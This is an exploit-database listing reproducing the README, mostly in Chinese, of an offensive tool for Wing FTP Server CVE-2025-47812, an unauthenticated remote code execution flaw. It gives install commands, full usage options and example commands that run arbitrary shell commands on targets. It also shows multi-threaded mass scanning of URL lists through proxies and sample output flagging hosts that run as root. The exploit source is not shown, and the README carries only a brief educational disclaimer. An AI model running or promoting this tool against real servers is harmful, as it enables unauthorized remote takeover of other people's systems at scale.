Sploitus

Exploit for CVE-2025-47812

kitploit · 2026-09-04

Exploit Code

MARKDOWN146 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XJUAREZ-CVE-2025-47812
# 🚀 Wing FTP Exploit - CVE-2025-47812

针对 Wing FTP Server CVE-2025-47812 的增强型利用工具 - 未授权远程代码执行 (RCE)

## 🔧 安装

克隆此仓库并进入目录:

root@kitploit:~
    
    
    git clone https://github.com/0xjuarez/CVE-2025-47812.git
    cd CVE-2025-47812
    pip install -r requirements.txt
    

或者直接下载 `CVE-2025-47812.py` 脚本并运行它。

## 🚀 使用方法

root@kitploit:~
    
    
    usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
    
    Exploit for Wing FTP Server CVE-2025-47812 - enhanced version
    
    options:
      -h, --help            显示此帮助信息
      -u URL, --url URL     目标URL(例如 http://192.168.1.100:5466)
      -f FILE, --file FILE  包含URL列表的文件(每行一个)
      -c COMMAND, --command COMMAND
                            要执行的命令(默认: echo CVE-2025-47812)
      -U USERNAME, --username USERNAME
                            用户名(default: anonymous)
      -P PASSWORD, --password PASSWORD
                            密码(default: 空)
      --check               检查模式:仅检测是否易受攻击(使用无害命令)
      -v, --verbose         详细模式(显示详细信息)
      --proxy PROXY         代理(例如 http://127.0.0.1:8080)
      --timeout TIMEOUT     超时秒数(default: 10)
      -o OUTPUT, --output OUTPUT
                            保存结果的文件
      --output-format {txt,json,csv}
                            输出格式(default: txt)
      --threads THREADS     扫描多个目标时的线程数(default: 5)
      --no-progress         隐藏进度条
    

## 🎯 基本示例

### 测试单个目标并执行命令:

root@kitploit:~
    
    
    python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
    

### 检查模式(仅检测漏洞):

root@kitploit:~
    
    
    python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
    

### 从文件扫描多个目标:

root@kitploit:~
    
    
    python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
    

### 使用代理并显示详细信息:

root@kitploit:~
    
    
    python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
    

## 📁 目标文件结构

文件应包含每行一个URL,例如:

root@kitploit:~
    
    
    http://192.168.1.10:5466
    http://192.168.1.11:5466
    https://ftp.miservidor.com:5466
    

## 📊 输出格式

### TXT

root@kitploit:~
    
    
    http://192.168.1.10:5466 - VULNERABLE - 用户: root
    http://192.168.1.11:5466 - SEGURO - 不易受攻击
    

### JSON

root@kitploit:~
    
    
    [
      {
        "target": "http://192.168.1.10:5466",
        "vulnerable": true,
        "info": "用户: root"
      }
    ]
    

### CSV

root@kitploit:~
    
    
    Target,Vulnerable,Info
    http://192.168.1.10:5466,True,用户: root
    

## ⚠️ 警告

此利用工具仅供教育目的和授权安全测试使用。未经明确同意对系统进行未经授权的使用是违法的,并可能带来严重的法律后果。作者不承担任何滥用责任。

## 🤝 致谢

  * 原作者: Sheikh Mohammad Hasan (4m3rr0r) – 发现与基础利用。
  * 改进与重构: 0xJuarez – 添加了大规模扫描、颜色、代理支持、多种输出格式以及可用性改进。



如果你喜欢这个作品,别忘了在GitHub上点个星 ⭐!

## 📄 许可证

本项目基于 MIT 许可证授权 – 详情请见 LICENSE 文件。